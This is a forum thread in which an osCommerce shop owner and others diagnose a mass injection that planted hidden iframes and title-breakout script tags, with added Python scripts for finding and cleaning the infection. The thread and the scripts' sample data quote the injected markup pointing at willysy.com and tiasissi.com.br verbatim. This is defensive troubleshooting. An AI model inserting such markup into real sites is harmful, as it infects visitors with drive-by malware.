
stevenchim

Help Please! SOS!


Starting from last Saturday, some additional code has been appearing on my site.

 

For example, when I receive an e-mail from the customer enquiry box,

the title is shown as XXXXXXXX<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>XXX

The script in between was added by unknown people.

 

Did anyone have this problem too?

And how can I remove it?


You have to find the files where the code was edited and re-edit them. Sometimes there is only one file and sometimes there are hundreds of them. There may also be files added to allow the hacker to continue editing your code. You need to remove all of those files. Once that is done, or before, you need to apply the security changes as mentioned many times a day on these forums. Otherwise the hacker will just come back.


Any idea where to start looking?

 

The first step I did was just searching for the keyword, but no result.

 

Any idea where I should start looking?

 

The recent change is that I changed the permission of the image folder to 777.


It varies with the hacker. Search for just iframe and that may show something. But keep in mind that legitimate code might use iframe too so you can't just delete any you find. Also look in your images directory for non-image files. There usually shouldn't be any except for a .htaccess file.

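As an added example (not code from this thread or from osCommerce itself), the following Python script does the two checks described in the reply above: it lists files under images/ that are neither images nor .htaccess, and it finds every <iframe> tag in text files, separating tags whose inline style hides them (the pattern quoted in this thread) from visible ones that need manual review rather than deletion. The sample tree it builds, including the includes/languages/english.php path and the file names, is constructed for illustration; point scan_webroot() at a real document root instead.

```python
"""Hunt for stray files and hidden iframes under an osCommerce web root.

Added example, not code from the thread or from osCommerce. The sample site
built in build_sample_site() is constructed for illustration; point
scan_webroot() at a real document root instead.
"""
import os
import re
import tempfile

IMAGE_EXTS = {".gif", ".jpg", ".jpeg", ".png", ".ico", ".bmp"}
ALLOWED_NON_IMAGE = {".htaccess"}   # the one non-image file images/ normally holds
TEXT_EXTS = {".php", ".html", ".htm", ".js", ".txt", ".tpl", ".inc"}

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
# Styles/attributes that make an iframe invisible to the visitor.
HIDDEN_RE = re.compile(
    r"visibility\s*:\s*hidden|display\s*:\s*none|(?:width|height)\s*=\s*['\"]?0\b",
    re.IGNORECASE,
)


def rel(path, root):
    """Root-relative path with forward slashes, so reports are portable."""
    return os.path.relpath(path, root).replace(os.sep, "/")


def stray_files_in_images(root):
    """Files under root/images that are neither images nor .htaccess."""
    stray = []
    for dirpath, _, files in os.walk(os.path.join(root, "images")):
        for name in files:
            ext = os.path.splitext(name)[1].lower()
            if name in ALLOWED_NON_IMAGE or ext in IMAGE_EXTS:
                continue
            stray.append(rel(os.path.join(dirpath, name), root))
    return sorted(stray)


def find_iframes(root):
    """(path, line_no, tag, hidden) for every <iframe> tag in text files."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in TEXT_EXTS:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                for line_no, line in enumerate(fh, 1):
                    for tag in IFRAME_RE.findall(line):
                        hidden = bool(HIDDEN_RE.search(tag))
                        hits.append((rel(path, root), line_no, tag, hidden))
    return sorted(hits)


def scan_webroot(root):
    """Split findings so visible iframes are reviewed rather than deleted."""
    hits = find_iframes(root)
    return {
        "stray_files": stray_files_in_images(root),
        "hidden_iframes": [h for h in hits if h[3]],
        "visible_iframes": [h for h in hits if not h[3]],
    }


def build_sample_site(root):
    """Constructed sample tree mirroring what the thread describes."""
    os.makedirs(os.path.join(root, "images", "banners"))
    os.makedirs(os.path.join(root, "includes", "languages"))
    hidden_iframe = ("<iframe src='http://willysy.com/images/banners/' "
                     "style='position:absolute;visibility:hidden'></iframe>")
    files = {
        "images/logo.gif": "GIF89a",
        "images/.htaccess": "Options -Indexes\n",
        # a PHP file dropped where only images belong (placeholder body)
        "images/banners/stray.php": "<?php /* placeholder for a dropped script */ ?>\n",
        # text define (assumed path) with the injected tag appended to the title
        "includes/languages/english.php":
            '<?php\ndefine("HEADER_TITLE_TOP", "My Shop' + hidden_iframe + '");\n',
        # a legitimate, visible iframe that must not be deleted blindly
        "index.php": "<iframe src='/help.html' width='400'></iframe>\n",
    }
    for name, content in files.items():
        with open(os.path.join(root, *name.split("/")), "w", encoding="utf-8") as fh:
            fh.write(content)


def demo():
    """Build the sample site, scan it and return the report."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_site(root)
        report = scan_webroot(root)
    for section, items in report.items():
        print(section)
        for item in items:
            print("   ", item)
    return report


if __name__ == "__main__":
    demo()
```

The stray-file list tells you what to quarantine and inspect; the hidden-iframe list tells you which files (or text defines) to restore from a clean copy; the visible-iframe list is the one you read before touching anything, since legitimate code uses iframes too.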


 

I found maybe twenty .php files in the image folder, which should not exist in this folder.

I deleted them all and am still looking for unusual files.

Thanks.


When I go to the site,

 

it loads some unknown elements like exero.eu, gooqlepic.com, yandekapi.com, etc.

 

Still finding where to remove them...


If you still have the problem it means you haven't removed all of the hacker's code.

If I were you I'd delete the entire site and restore it all from a good backup, provided you have a good backup? If not, I suggest you get a professional to look at your files and cleanse them properly. Like Jack said, you will then have to apply security measures.


~ Don't mistake my kindness for weakness ~


My site got hacked this way too.

You need to erase the injected code in your database.

http://blog.armorize.com/2011/07/willysycom-mass-injection-ongoing.html

In my case I had to remove <iframe> tags from zen_configuration and <script> from zen_categories_description. I'm using Zen-cart 1.2.x.

 

The site works now, but I wonder how it's possible to make sure this won't happen again. Has any patch been released?



 

Thanks for your information.

I have looked into the database, but it seems fine to me.

I can't find any <iframe> tags in the database :(


Hi there,

 

We have the same problem. We've been infected with this:

 

<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>

 

It was in the 'configuration_value' field of the 'configuration' table, in the first record, where 'Store_name' is. We've been able to clean the database and now it is fine, but we don't know what to do. We assume this is an osCommerce bug, but which version is safe? Do we have to upgrade from 2.2RC2 to 2.3.1? Is this bug in the new ones too?

 

Thanks

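As an added example (not code from this thread, osCommerce or Zen Cart), the following Python script shows how to audit and clean database text fields for the markup quoted in this thread. It uses an in-memory SQLite database as a stand-in for the shop's MySQL database; the table and column names (configuration with configuration_key/configuration_value, and categories_description) follow the posts above, the STORE_NAME key and the sample rows are constructed, and the injected strings are the ones quoted in the thread.

```python
"""Audit and clean injected markup in shop database text fields.

Added example, not code from the thread, osCommerce or Zen Cart. An
in-memory SQLite database stands in for the shop's MySQL database; the
table/column names follow the posts above and the rows are constructed.
"""
import re
import sqlite3

# Matches a complete <iframe>...</iframe> or <script>...</script> element,
# or a lone opening tag if the closing one is missing.
INJECTED_RE = re.compile(
    r"<(iframe|script)\b[^>]*>.*?</\1\s*>|<(?:iframe|script)\b[^>]*>",
    re.IGNORECASE | re.DOTALL,
)
# The </title>...<title> wrapper used to break out of the page title.
TITLE_BREAKOUT_RE = re.compile(r"</?title>", re.IGNORECASE)

# (table, key column used for reporting/updating, text column to audit).
# Identifiers come from this trusted list, never from user input.
AUDIT_COLUMNS = [
    ("configuration", "configuration_key", "configuration_value"),
    ("categories_description", "categories_id", "categories_name"),
    ("categories_description", "categories_id", "categories_description"),
]


def find_injected(conn, audit_columns=AUDIT_COLUMNS):
    """Return (table, column, row_key, markup) for every tainted cell."""
    findings = []
    for table, key_col, text_col in audit_columns:
        sql = (f"SELECT {key_col}, {text_col} FROM {table} "
               f"WHERE {text_col} LIKE '%<iframe%' OR {text_col} LIKE '%<script%'")
        for key, value in conn.execute(sql):
            for match in INJECTED_RE.finditer(value or ""):
                findings.append((table, text_col, key, match.group(0)))
    return findings


def clean_value(value):
    """Strip injected iframe/script elements and the title breakout."""
    cleaned = INJECTED_RE.sub("", value)
    return TITLE_BREAKOUT_RE.sub("", cleaned).strip()


def clean_table(conn, table, key_col, text_col):
    """Rewrite tainted cells of one column in place; returns rows updated."""
    rows = conn.execute(f"SELECT {key_col}, {text_col} FROM {table}").fetchall()
    updated = 0
    for key, value in rows:
        if value and INJECTED_RE.search(value):
            conn.execute(f"UPDATE {table} SET {text_col} = ? WHERE {key_col} = ?",
                         (clean_value(value), key))
            updated += 1
    conn.commit()
    return updated


def build_sample_db():
    """Constructed tables and rows; the injected strings are those quoted in the thread."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE configuration (
            configuration_key TEXT PRIMARY KEY, configuration_value TEXT);
        CREATE TABLE categories_description (
            categories_id INTEGER PRIMARY KEY, categories_name TEXT,
            categories_description TEXT);
    """)
    iframe = ("<iframe src='http://willysy.com/images/banners/' "
              "style='position:absolute;visibility:hidden'></iframe>")
    script = "</title><script src=http://tiasissi.com.br/revendedores/jquery/></script><title>"
    conn.executemany("INSERT INTO configuration VALUES (?, ?)", [
        ("STORE_NAME", "My Shop" + iframe),   # STORE_NAME key is an assumption
        ("STORE_OWNER", "Shop Owner"),
    ])
    conn.executemany("INSERT INTO categories_description VALUES (?, ?, ?)", [
        (1, "Hardware", "Tools and parts"),
        (2, "Software" + script, "Downloads"),
    ])
    conn.commit()
    return conn


def demo():
    """Scan, clean every audited column, rescan, and return the results."""
    conn = build_sample_db()
    before = find_injected(conn)
    updated = sum(clean_table(conn, *spec) for spec in AUDIT_COLUMNS)
    after = find_injected(conn)
    store_name = conn.execute(
        "SELECT configuration_value FROM configuration WHERE configuration_key = 'STORE_NAME'"
    ).fetchone()[0]
    category = conn.execute(
        "SELECT categories_name FROM categories_description WHERE categories_id = 2"
    ).fetchone()[0]
    for finding in before:
        print("tainted:", finding)
    print("rows updated:", updated)
    return {"before": before, "after": after, "updated": updated,
            "store_name": store_name, "category_name": category}


if __name__ == "__main__":
    demo()
```

Run find_injected() first and read the findings before running clean_table(), and take a database dump beforehand; on a real shop, extend AUDIT_COLUMNS to every text column the injection could reach, since a later post in this thread reports the same style of injection landing in other text fields too. Cleaning the rows only removes the symptom: if the value is rewritten again a few hours later, the way in is still open and the security fixes discussed in this thread are what close it.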

If you are using version 2.2, make sure you apply ALL the security measures described here: http://forums.oscommerce.com/topic/313323-how-to-secure-your-oscommerce-22-site/

 

Version 2.3.1 has fixed a lot of security bugs; upgrading from 2.2 to 2.3.1 requires some work on the database because the structure is different, and many add-ons written for 2.2 will have to be slightly worked on to work on 2.3.1.


 

Ok, working on it. We'll report further problems.


Those are not injected in the database, but inside the text defines of your site (at least in the ones we analyzed).

So a grep for that keyword should find where they are...

 

This scanner should tell you if your site is hacked: http://sitecheck.sucuri.net


Our site got hacked as well.

It was injected in the DB (config values).

Only removing it from the database won't help for long; you have to update the security.

We followed the steps on the above-mentioned secure osCommerce thread and installed the osc_sec package r8. Since then, no more successful attacks (although we get attacks every 5 hours or so with all kinds of attempts to get in...) - none gets through anymore ;)

 

Oh, we have 2.2, so I don't think you have to update the whole system; I wouldn't take that pain...

 

Feel free to contact us for help.


 

So which table(s) of DB is affected?


Steven

 

Basically, if your site is not patched against the known exploit hole in the admin area that was reported last year, then removing all the hack code will be no different than trying to push the tide out with your hands.

 

You also need to patch your site's security as listed in most of the discussions in this part of the forums.

 

That is assuming you are at least using a recent version of osCommerce.

 

Versions up to 2.2rc1 need patching urgently, and in cases where 2.2rc1 has been completely trashed by hacks, it's best then to just upgrade to 2.3.1. Pound for pound, it's no different in terms of time and energy to fix a heavily hacked-up website than it is to transfer to the latest version of osCommerce.

 

I have observed many users spend weeks trying to track and trace through all of their files to repair the damage that 'some' hacks can wreak on a website; match that to the week it would take you to rebuild your site on 2.3.1 and import your products.

 

Earlier versions than 2.2 just need to be ditched, and you need to start again with 2.3.1.

 

Most of those files you found in your images directory will probably be shell code - or in plain terms, file managers that give hackers almost the same amount of access to your site as the file manager in the admin directory does.

 

If you intend to continue using 2.2rc1 after cleaning up, then I recommend that you follow the suggestions here - at the very least options 2, 5 & 6 - the rest being optional extras that can help improve security as well.


- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX


 

Thank you very much for the advice. I will try to see what I can do.

 

As we all know, the shop name gets changed about every 5 hours.

Yesterday I deleted the file manager PHP file from admin.

And now it seems fine.


Query11: Very good scripts, thanks for sharing. They are now using "1see.ir/j/" in the injection... So a new one to add there.

Thank you for your useful information.

Looks like "1see.ir/j/" is an improved version of "exero".

It infects not only the configuration: "1see.ir/j/" can be injected into any text field of the database.

Here is the free script for removing "1see.ir/j/":

http://www.greatis.com/security/1see-ir-infection-removal.htm


After I did all the actions mentioned above,

the site was OK for the last few days,

but today something new has come up:

 

(shop name)</title><script src=http://tiasissi.com.br/revendedores/jquery/></script><title>

 

sign...


Steven,

 

Your site is vulnerable to hacker attacks and needs to be cleaned and secured to prevent injection attacks like that.

 

 

 

 

 

Chris



Steven did you give osC_Sec a try in the end?


- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX

Share this post


Link to post
Share on other sites

×